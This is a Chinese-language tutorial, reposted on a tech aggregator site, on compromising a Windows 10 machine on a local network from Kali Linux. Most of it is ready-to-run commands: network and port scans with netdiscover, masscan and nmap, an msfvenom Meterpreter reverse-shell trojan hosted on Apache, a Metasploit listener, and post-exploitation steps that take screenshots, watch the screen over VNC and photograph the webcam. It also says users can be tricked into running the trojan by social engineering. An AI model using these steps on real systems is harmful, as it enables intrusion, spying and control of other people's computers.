IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> Kali渗透局域网机器 -> 正文阅读

[系统运维]Kali渗透局域网机器

一、实验环境:

靶?机:?windows10台式机(可以自己搭一个虚拟机,我这里用物理机做靶机):192.168.1.114
攻击机:?kali虚拟机:192.168.1.116

二、msf工具基本用法:

msfconsole?? ??#进入msf框架
search? 相关漏洞(如search ms17_010)? ? ??# 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue ? ? ?# 使用use进入漏洞相关模块
info? ? ? #使用info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp ? ???#设置攻击载荷
show options? ? ??#查看模块需要配置的参数
set ?RHOST ?192.168.1.114? ? ? #设置Remote的IP
exploit、run? ? ? ??#两个命令都可以进行攻击

下面开始进入实战:

1.?主机发现(扫描局域网所有存活机器):

netdiscover -i eth0 -r 192.168.10.0/24

目前局域网有4台设备在线,192.168.1.114就是我们要攻击的靶机。

?2.?端口扫描(扫描该靶机开放的端口):

masscan --rate=10000 -p0-65535 192.168.1.114

3.?扫描各端口所属服务:

nmap -sV -T4?192.168.1.114

nmap -sV -T4 -O -p 135,139,445?192.168.1.114(可特定某些端口)

4.?msf生成木马:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.116?lport=8888?-f exe -o /var/www/html/ltw.exe

lhost:kali的IP地址

lport:设置监听的端口,可以随意设置,只要不被占用,靶机点击木马后kali通过8888端口进行监听。

/var/www/html/ltw.exe:我这边把木马放到Apache服务器上,所以kali要安装Apache。

安装方法:apt-get install httpd(可能会报错),如果报错改为:apt-get install apache2。然后通过service apache2 start 启动Apache

?Apache已经成功启动。

?5.?如何让靶机运行你生成的木马:

可通过社工、漏洞利用等方式让用户进行点击,这边不做详解。

6.?配置监听:

msfconsole打开msf

开启后门监听

命令:use exploit/multi/handler?

查看有哪些可利用的payloads

命令:show payloads

set payload windows/meterpreter/reverse_tcp???? #设置攻击载荷

show options? ?#设置要配置哪些信息

set lhost 192.168.1.116? ? ?

set lport 8888

exploit

我们开启了一个reverse TCP监听器来监听本地的8888端口,即我(攻击者)的Kali主机地址(LHOST)和端口号(LPORT)

输出metetpreter这个后渗透模块,攻击成功,现在可以对靶机进行控制。

7.?进行后渗透:?

screenshot:截图

run vnc -i:监控靶机屏幕

webcam_snap 靶机摄像头拍照

输入:?shell即可切换到目标主机的windows cmd_shell里面:

shell ? ? ? ? #获取目标主机的cmd_shell权限
chcp 65001 ? ?#这里为了避免目标主机cmd_shell字符乱码,设置目标主机命令行的字符编码,65001是UTF-8

exit? ? ? ? ? ? ? ? ?#退回到meterpreter

background? ? #把我们获得的meterpreter会话挂载到后台运行

sessions -l? ? ? #查看获得的meterpreter_shell会话列表

session 1? ? ? ? #重新进入meterpreter

?

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-05-14 10:14:47  更:2022-05-14 10:15:20 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 15:23:50-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码